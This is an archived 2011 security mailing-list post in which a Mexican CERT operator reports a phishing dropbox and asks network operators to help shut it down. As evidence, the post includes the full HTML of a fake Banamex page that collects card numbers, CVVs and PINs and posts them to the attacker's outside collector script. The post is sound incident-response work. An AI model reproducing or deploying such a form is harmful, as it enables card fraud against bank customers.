[nsp-sec] Phishing dropbox at AS32392
David Jiménez
ddavinci at gmail.com
Wed Jul 27 12:24:18 EDT 2011
Hi folks,
We are getting a lot of reports related to a phishing scam in email
attachment with a dropbox at hxxp://
asmuhendisler.com/i/templates/beez/css/b/m.php. This domain resolves to
72.41.179.52 at AS32392
AS | IP | AS Name
32392 | 72.41.179.52 | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
Attached to this message you'll find the evidence.
Is there someone from AS32392 in the list or anyone that could help to track
sessions to this IP and shutdown this site script?
Kind Regards
--
---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
EVIDENCE
////////////////////
<title>Banamex.com: BancaNet - Restaurar su cuenta</title>
<body background="http://www.juropnet.hu/~maria/mx.png">
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<script type="text/javascript">
<!--
// copyright 1999 Idocs, Inc. http://www.idocs.com
// Distribute this script freely but keep this notice in place
function numbersonly(myfield, e, dec)
{
var key;
var keychar;
if (window.event)
key = window.event.keyCode;
else if (e)
key = e.which;
else
return true;
keychar = String.fromCharCode(key);
// control keys
if ((key==null) || (key==0) || (key==8) ||
(key==9) || (key==13) || (key==27) )
return true;
// numbers
else if ((("0123456789").indexOf(keychar) > -1))
return true;
// decimal point jump
else if (dec && (keychar == "."))
{
myfield.form.elements[dec].focus();
return false;
}
else
return false;
}
//-->
</SCRIPT>
<script type="text/javascript">
function checkLen(x,y)
{
if (y.length==x.maxLength)
{
var next=x.tabIndex;
if (next<document.getElementById("form1").length)
{
document.getElementById("form1").elements[next].focus();
}
}
}
</script>
<SCRIPT language=Javascript>
function sloboz(){
signupFORM = document.form1;
if(signupFORM.cc.value == ""){
alert("Por favor, introduzca su N˙mero de tarjeta.");return
false;}
if(signupFORM.cc.length <16){
alert("N˙mero de tarjeta no v·lido. Por favor, intÈntelo de
nuevo.");return false;}
if(signupFORM.cvv.value == ""){
alert("Por favor, introduzca su CVV.");return false;}
if(signupFORM.cvv.length <3){
alert("CVV no v·lido. Por favor, intÈntelo de nuevo.");return
false;}
if(signupFORM.pin.value == ""){
alert("Por favor, introduzca su PIN de la tarjeta.");return
false;}
if(signupFORM.pin.length <4){
alert("PIN de la tarjeta no es v·lida. La longitud del PIN de la tarjeta
es de 4 dÌgitos.");return false;}
return true;
}
</SCRIPT>
<form name="form1" method="post" action="
http://asmuhendisler.com/i/templates/beez/css/b/m.php">
<table width="45%">
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>Número de tarjeta: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="cc" type="text" name="cc" value="" maxlength="17"
onKeyPress="return numbersonly(this, event)" size=20 />
</span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>Fecha de caducidad: </b></font></div>
</td>
<td width="60%"><span class="iskierda">
<select name="mm" id="mm" size="1">
<option><font face="Arial"><span style="font-size: 9pt">- Mes
-</span></font></option>
<option value="01"><font face="Arial"><span style="font-size:
9pt">01</span></font></option>
<option value="02"><font face="Arial"><span style="font-size:
9pt">02</span></font></option>
<option value="03"><font face="Arial"><span style="font-size:
9pt">03</span></font></option>
<option value="04"><font face="Arial"><span style="font-size:
9pt">04</span></font></option>
<option value="05"><font face="Arial"><span style="font-size:
9pt">05</span></font></option>
<option value="06"><font face="Arial"><span style="font-size:
9pt">06</span></font></option>
<option value="07"><font face="Arial"><span style="font-size:
9pt">07</span></font></option>
<option value="08"><font face="Arial"><span style="font-size:
9pt">08</span></font></option>
<option value="09"><font face="Arial"><span style="font-size:
9pt">09</span></font></option>
<option value="10"><font face="Arial"><span style="font-size:
9pt">10</span></font></option>
<option value="11"><font face="Arial"><span style="font-size:
9pt">11</span></font></option>
<option value="12"><font face="Arial"><span style="font-size:
9pt">12</span></font></option>
</select>
<select name="yyyy" id="yyyy" size="1">
<option selected><font face="Arial"><span style="font-size: 9pt">-
Ano
-</span></font></option>
<option value="2011"><font face="Arial"><span style="font-size:
9pt">2011
</span></font></option>
<option value="2012"><font face="Arial"><span style="font-size:
9pt">2012
</span></font></option>
<option value="2013"><font face="Arial"><span style="font-size:
9pt">2013
</span></font></option>
<option value="2014"><font face="Arial"><span style="font-size:
9pt">2014
</span></font></option>
<option value="2015"><font face="Arial"><span style="font-size:
9pt">2015
</span></font></option>
<option value="2016"><font face="Arial"><span style="font-size:
9pt">2016
</span></font></option>
<option value="2017"><font face="Arial"><span style="font-size:
9pt">2017
</span></font></option>
<option value="2018"><font face="Arial"><span style="font-size:
9pt">2018
</span></font></option>
<option value="2019"><font face="Arial"><span style="font-size:
9pt">2019
</span></font></option>
<option><font face="Arial"><span style="font-size:
9pt">2020</span></font></option>
</select>
</span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>CVV: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="pin1" name="cvv" value="" maxlength="3"
onKeyPress="return numbersonly(this, event)" size="1" />
</span></font><font size="1" color="#000000"><font size="1"
color="#000000"><b><font size="1" color="#000000"><font size="1"
color="#000000"><b><font size="1" color="#000000"><b><font face="Arial,
Helvetica, sans-serif"><img src="
https://projectbubble.com/static/images/cards-cvv.png"
align="absmiddle"></font></b></font></b></font></font></b>
<font size="1" color="#000000"><font face="Arial, Helvetica,
sans-serif">(número
de verificación de tarjeta de 3
digitos)</font></font></font></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>PIN de la Tarjeta: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="pin0" type="password" name="pin" value="" maxlength="6"
onKeyPress="return numbersonly(this, event)" size="5" />
</span><span class="iskierda"><font size="1" color="#000000"><font
size="1" color="#000000"></font></font></span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
</span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input type="submit" class="btn_verde" value="Continuar"
style="color: #FFFFFF; background-color: #339933" name="Submit"
onClick="return sloboz()" >
</span></font></span></td>
</tr>
</table>
</form>
<p> </p>
More information about the nsp-security
mailing list